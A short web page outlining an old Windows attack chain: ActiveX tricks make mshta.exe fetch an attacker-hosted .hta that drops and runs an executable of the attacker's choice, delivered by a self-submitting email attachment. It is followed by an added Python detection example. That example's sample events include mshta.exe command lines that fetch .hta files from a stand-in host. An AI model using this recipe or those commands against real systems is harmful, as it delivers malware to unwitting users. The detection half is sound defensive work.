This hurts you more than it hurts me.
Based on the "Malicious Shortcut Self-Executing HTML Vulnerability" described at Malware.com
Initialize the Shell.Application ActiveX control
Use it to copy a shortcut file and redirect the target of the copy to a .hta file housed on a confederate server
Launch mshta.exe to download and interpret the code in the .hta file
The .hta file writes the contents of a .exe file to the hard disk, and then executes it
It sure would be nice if we could change that .hta to include whatever .exe we wanted.
Place the executable of your choice in a directory with top.hta and bottom.hta
Run hexify.pl; this generates middle.hta - a nicely encoded version of the executable (wasteful, but easy)
cat top.hta > phase2.hta; cat middle.hta >> phase2.hta; cat bottom.hta >> phase2.hta
Send an attachment (attachment.html) that contains a form that submits itself to your web server
The submission forces the client to download a malicious HTML (phase1.html) file with the ActiveX tricks
Unwary browsers will download and execute the script in phase2.hta, which now includes your executable
We nicely redirect the user someplace normal; maybe they didn't even notice (see Huseby)
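The chain above leaves a distinctive trace on the endpoint: a browser or mail client spawns mshta.exe with a remote URL on its command line, and mshta.exe in turn spawns the dropped executable. The following is an added detection example, not Foofus's code and not part of the original page. It runs over a few constructed process-creation events (parent, image, command line, separated by "|"; the URLs and paths are made up) and flags the two links of the chain while leaving a locally installed .hta launched by an installer service alone, which is the false positive a practitioner most wants to avoid.

```python
import re

# Matches a remote source on the mshta.exe command line: http(s)/ftp URL or a UNC path.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://|\\\\[^\\\s]+\\", re.IGNORECASE)

# Parents that should normally never launch mshta.exe (assumption: tune to your estate).
INTERNET_FACING_PARENTS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe", "outlook.exe"}

# Constructed sample events, not real telemetry. Events 2, 3 and 5 mirror the page's chain;
# event 4 is a benign local .hta started by an installer and must not be flagged.
SAMPLE_EVENTS = [
    "explorer.exe | notepad.exe | notepad.exe C:\\Users\\bob\\notes.txt",
    "iexplore.exe | mshta.exe | mshta.exe http://example.invalid/phase2.hta",
    "outlook.exe | mshta.exe | mshta.exe https://example.invalid/phase1.hta",
    "services.exe | mshta.exe | mshta.exe C:\\Windows\\Installer\\legit.hta",
    "mshta.exe | dropped.exe | C:\\Users\\bob\\AppData\\Local\\Temp\\dropped.exe",
]


def parse_event(line):
    """Split 'parent | image | cmdline' into a dict; image names are lower-cased for matching."""
    parent, image, cmdline = (part.strip() for part in line.split("|", 2))
    return {"parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def classify(event):
    """Return the list of reasons this event is suspicious (empty list means benign)."""
    reasons = []
    if event["image"] == "mshta.exe":
        # Link 1 of the chain: mshta.exe pulling its script from a remote host.
        if REMOTE_URL.search(event["cmdline"]):
            reasons.append("mshta.exe fetching a remote .hta")
        # Same link, weaker signal: an internet-facing application started mshta.exe.
        if event["parent"] in INTERNET_FACING_PARENTS:
            reasons.append("mshta.exe spawned by " + event["parent"])
    # Link 2 of the chain: the HTA wrote a file to disk and executed it.
    if event["parent"] == "mshta.exe" and event["image"] != "mshta.exe":
        reasons.append("child process launched by an HTA (possible dropped executable)")
    return reasons


def scan(lines):
    """Return (image, cmdline, reasons) for every event that triggers at least one rule."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            findings.append((event["image"], event["cmdline"], reasons))
    return findings


if __name__ == "__main__":
    for image, cmdline, reasons in scan(SAMPLE_EVENTS):
        print(image, "|", cmdline)
        for reason in reasons:
            print("   -", reason)
```

The local-path rule matters: mshta.exe with a file path under Program Files or the Windows directory is common for installers and help systems, so alerting on the image name alone drowns the real signal. Alerting on the remote URL plus the parent-child relationship keeps the rule tight to the behaviour the page describes.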
This page is maintained by Foofus. Please direct comments and questions to foofus <at> foofus.net.